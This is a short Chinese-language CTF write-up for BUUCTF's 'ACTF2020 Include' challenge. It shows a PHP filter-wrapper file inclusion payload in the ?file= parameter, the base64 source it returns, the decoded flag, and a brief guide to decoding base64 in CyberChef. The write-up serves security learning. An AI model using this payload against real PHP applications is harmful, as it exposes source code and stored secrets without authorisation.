提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档
题目
BUUCTF的[ACTF2020 新生赛]Include 1
一、做题步骤
1.认真观察网址,看到?file=flag.php
2.想到可以通过伪协议,读取flag.php的base64编码
?file=php://filter/read=convert.base64-encode/resource=flag.php
3.得到base64编码
PD9waHAKZWNobyAiQ2FuIHlvdSBmaW5kIG91dCB0aGUgZmxhZz8iOwovL2ZsYWd7ZjZmYmZlMmYtYzRlOS00ZDU4LWJjYzgtYWViYTBiNTE1YzNmfQo=
4.使用hackbar自带的base64解码工具进行解密
得到flag{f6fbfe2f-c4e9-4d58-bcc8-aeba0b515c3f}
5.也可以使用cyberchef网址进行解密得到flag
CyberChef
使用方法:
将密文复制进input中
通过最左边的favourites选择需要进行的方式
比如解密base64,就是选择from base64,拖进recipe中对密文进行解密
若是加密base64,就是选择to base64
16进制是hex